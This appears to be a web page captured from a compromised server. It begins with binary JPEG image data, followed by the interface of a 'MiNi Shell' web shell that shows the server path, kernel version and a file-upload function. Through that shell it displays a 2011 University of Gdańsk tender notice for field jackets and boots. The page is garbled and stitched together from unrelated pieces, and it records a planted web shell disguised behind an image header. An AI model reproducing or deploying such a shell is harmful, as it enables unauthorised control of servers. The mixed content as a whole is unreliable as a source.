JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111222/342375-N-2011.html

<p class="kh_header"><b>Gdańsk: Dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego</b><br>
<b>Numer ogłoszenia: 342375 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego.
1. Sukcesywna dostawa kurtek terenowych i butów terenowych wg  załącznika  nr 2  do SIWZ.
2.   Zamawiający wymaga aby oferowane artykuły  w celu zachowania odpowiednich   
       parametrów i standardów jakościowych, były takie, jak wymienione                                    
       w załączniku nr 2.
3.    Podane ilości poszczególnych asortymentów są wielkościami  szacunkowymi
       i mogą być zarówno mniejsze jak i większe, lecz ogólna wartość nie przekroczy  
       kwoty określonej w umowie.
4 .   Wykonawca dostarczy artykuły  własnym transportem, i zapewni rozładunek w   miejscu   
       przeznaczenia  wskazanym przez Zamawiającego.
5.    Dostawa zamówionej  partii artykułów (do magazynu na adres 80-952 Gdańsk, ul.  
       Wita Stwosza 58) następować będzie w terminie nie dłuższym niż 7 dni od daty 
       złożenia zamówienia (mailem lub faxem) od poniedziałku do piątku a ich wielkość i 
       częstotliwość  wynikać będzie z jednostronnych dyspozycji Zamawiającego.
6.    Pracownik Zamawiającego odpowiedzialny za odbiór artykułów:  p. Barbara Rogatka         
        tel.  58 523 24 58. 
7.    Wykonawca skontaktuje się telefonicznie z pracownikiem  wymienionym powyżej w celu   
        potwierdzenia  terminu dostawy. 
8.    Dostarczona partia artykułów nie zostanie odebrana przez Zamawiającego w 
       przypadku stwierdzenia niezgodności z przedmiotem zamówienia, umową lub 
       fakturą.
 9.   Zamawiający wymaga  aby dostarczone  artykuły posiadały nienaruszone                       
       opakowania  fabryczne oraz  nienaruszone cechy pierwotnego opakowania:
       1)kurtki terenowe opatrzone były wszytymi metkami z nazwą  
          producenta, składem tkaniny, temperaturą prania i  rozmiarem.
       2) buty terenowe metkami z nazwą producenta, opisem sposobu konserwacji           
           i rozmiarem.
10.  Zamawiający dopuszcza możliwość składania ofert  równoważnych,  ( nie gorszych   
       jakościowo niż proponowane przez Zamawiającego).  
      Jeżeli Wykonawca proponuje artykuł równoważny musi  skreślić  (nie jest wymagane parafowanie skreśleń) artykuł proponowany przez Zamawiającego i  wpisać (załącznik  nr 2  - rubryka 3 - odpowiednio pozycjami ) proponowany artykuł  równoważny  z  dokładną nazwą tkaniny, z podaniem producenta wyrobu, numerem katalogowym, dokładnym opisem cech jakościowych  i parametrów technicznych produktu. Na Wykonawcy ciąży obowiązek udowodnienia,  iż  proponowany artykuł jest równoważny  do wymaganego   (wskazanego) przez Zamawiającego.
11.  W razie stwierdzenia wad w odebranych artykułach Zamawiający złoży stosowną   
       reklamację (pisemną) według § 6 projektu umowy do SIWZ.
12.  Gwarancja 12 miesięcy, obejmować będzie wszystkie wykryte podczas    
       eksploatacji wady oraz uszkodzenia powstałe w czasie poprawnego, zgodnego z  
       przeznaczeniem użytkowania, przy czym Wykonawca może zaproponować czas   
       gwarancji dłuższy.  
13.  Zamawiający zastrzega sobie prawo do niezrealizowania przedmiotu zamówienia w    
       całości, jednak nie więcej niż 20 %  wartości umowy. Wykonawcy  nie przysługują  
       roszczenia  odszkodowawcze wobec Zamawiającego  z tytułu rezygnacji   z części     
       artykułów  określonych  w załączniku  nr 2 do SIWZ.
14. Wykonawca zapewni  niezmienność cen do końca realizacji zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-0, 18.81.50.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga wykazania  się  przez Wykonawcę, wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem dostaw w  zakresie niezbędnym  do wykazania  spełniania warunku wiedzy i doświadczenia w okresie  ostatnich  trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie, poprzez realizację co najmniej  jednej dostawy  o wartości  nie mniejszej niż       55.000,00 PLN brutto, odpowiadającej swoim rodzajem, dostawie stanowiącej przedmiot zamówienia, z podaniem  wartości, przedmiotu zamówienia, daty wykonania i odbiorcy, oraz załączenie dokumentu potwierdzającego, że ta dostawa  została wykonana  lub jest wykonywana należycie.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana  wg formuły  spełnia - nie spełnia na podstawie  dokumentów dołaczonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oświadczenie o podwykonawcach, jeżeli  Wykonawca  zamierza powierzyć podwykonawcom określony zakres zamówienia, musi  wykazać to w niniejszym załączniku. Wykonawca wykonujący zamówienie  wyłącznie siłami własnymi   nie dołącza do oferty załącznika nr 7 (do SIWZ).
      
      Oświadczenie  składa jeden z Wykonawców ubiegających się wspólnie o udzielenie zamówienia, (w imieniu członków konsorcjum dokument ten  może złożyć pełnomocnik - z treści tego oświadczenia musi wyraźnie wynikać, że pełnomocnik składa je w imieniu członków konsorcjum).
2)  Zaakceptowany przez Wykonawcę projekt umowy - załącznik nr 5 (do SIWZ);
Wykonawca może też zastosować się do  informacji  zawartej w rozdz. XVI pkt 1. 
3)	oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy, podpisane przez osobę(y) upoważnioną(e) do składania oświadczeń woli w imieniu Wykonawcy - załącznik nr 3 (do SIWZ). 
4) Załącznik nr 1 - formularz ofertowy
     wg załączonego wzoru oferty, wypełniony i podpisany, przez osob(ę)y   upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy.
          
           W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających      
wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden                 
z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu (upoważniony przez pozostałych jako ich reprezentant stosowną umową, czy też  pełnomocnictwem).

5)  Załącznik nr 2 - formularz cenowy 
      wypełniony i podpisany,  przez osob(ę)y upoważnion(ą)e do składania oświadczeń   
      woli w imieniu Wykonawcy.

            W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających 
 wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  
 z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia w/w    dokumentu (upoważniony przez pozostałych jako ich reprezentant stosowną umową, czy też  pełnomocnictwem).

Wykonawcy mający siedzibę lub miejsce zamieszkania za granicą:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  
            Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale V                                       pkt. 2.2), składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce  
           zamieszkania, potwierdzające odpowiednio, że: 
      a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
2)	Dokumenty, o których mowa powyżej powinny być wystawione nie wcześniej niż                     6  miesięcy przed upływem terminu składania ofert. 
3)	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę   lub miejsce zamieszkania, nie wydaje się tego dokumentu, zastępuje się je   dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym  organem sądowym, administracyjnym albo organem samorządu zawodowego lub  gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym  Wykonawca ma siedzibę lub miejsce zamieszkania.

6. Informacje dotyczące składania dokumentów.

1)  Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniami na język polski, poświadczonymi za zgodność z oryginałem przez Wykonawcę. Wykonawca, według swojego uznania może też przedstawić tłumaczenie dokonane przez tłumacza przysięgłego, które nie wymaga poświadczenia za zgodność.
2) Dokumenty mają być składane w formie oryginału lub kserokopii poświadczonej                    za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy zgodnie z wpisem w stosownym dokumencie uprawniającym do wystąpienia w obrocie prawnym) lub notariusza.
   3)  Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej, przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym, jeżeli zostanie potwierdzony przez organ wydający w wymaganym terminie.
4)   Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa   w art. 25 ust.1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym  upłynął termin składania ofert - art. 26 ust. 3 ustawy.
5)   Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy  nie wykażą spełnienia warunków udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
6)   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w trybie art. 23
      ust. 1-4 ustawy, w tym w ramach konsorcjum.
7)  W przypadku opisanym w pkt. 6) Wykonawcy ustanawiają pełnomocnika do  
      reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania   
      w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, Zamawiający 
      może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy   
      regulującej współpracę tych Wykonawców  (art. 23 ust. 4 ustawy).
8)  W przypadku, gdy Wykonawcę reprezentuje pełnomocnik (można wystawić jednorazowe          
      pełnomocnictwo do danego konkretnego postępowania), do oferty musi być załączone           
      pełnomocnictwo (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika 
      z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres 
     na które zostało wystawione oraz podpisane przez osoby uprawnione do reprezentacji. 
     W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność 
     z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza.
9)  Wykonawca może polegać na wiedzy i doświadczeniu lub zdolnościach innych 
     podmiotów, niezależenie od charakteru prawnego łączących go z nim stosunków. 
     Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie 
      dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności 
      przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do  
      dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu 
       zamówienia.
10) Jeżeli Wykonawca wykazując spełnianie warunków udziału w postępowaniu, o których 
       mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach 
        określonych w art. 26 ust. 2 b ustawy, zobowiązany jest przedłożyć w odniesieniu do tych   
        podmiotów dokumenty, o których mowa w pkt. 2 ppkt. 1) i 2).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotna zmiana postanowień umowy dopuszczalna  jest w następujących przypadkach:

      1)    zmiany terminu realizacji umowy  z przyczyn  leżących po stronie Zamawiającego (sytuacja ekonomiczna, zdolności płatnicze lub warunki organizacyjne czy też z przyczyn technicznych) lub zmiany te są korzystne dla Zamawiającego, 
       2)   zaistnienia siły wyższej,
       3)   zmiany obowiązujących przepisów prawa.
Zamawiający może odstąpić od umowy:
1)	 Zamawiający może odstąpić od umowy, jeśli wykonanie umowy nie leży w interesie publicznym, zgodnie z art. 145 ustawy.  W tym wypadku,  Zamawiający może odstąpić od umowy w terminie  30 dni  od powzięcia wiadomości   o tych  okolicznościach.
2)	 W wypadku określonym w pkt. 1 Wykonawca może żądać jedynie  wynagrodzenia należnego  mu z tytułu  wykonania części umowy.
3)	Zamawiający może  również odstąpić od umowy na zasadach określonych w pkt. 1 i 2 niniejszego ustępu , w wypadku ogłoszenia upadłości lub likwidacji przedsiębiorstwa Wykonawcy, wydania  nakazu zajęcia majątku Wykonawcy.
4)	Zamawiający może odstąpić od umowy w trybie natychmiastowym w przypadku, gdy dostawa jest realizowana wadliwie lub sprzecznie z umową.
Wszelkie zmiany umowy  wymagają dla swej ważności formy pisemnej w postaci   aneksu  podpisanego  i zatwierdzonego przez  obie strony. 
Wykonawca nie ma prawa cesji praw i/lub obowiązków wynikających  umowy na rzecz 
       osób trzecich z zastrzeżeniem ust 11.
Cesja wierzytelności Wykonawcy wynikających  umowy wymaga dla swej ważności 
       uprzedniej pisemnej zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul. Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2011 godzina 11:00, miejsce: Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul. Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com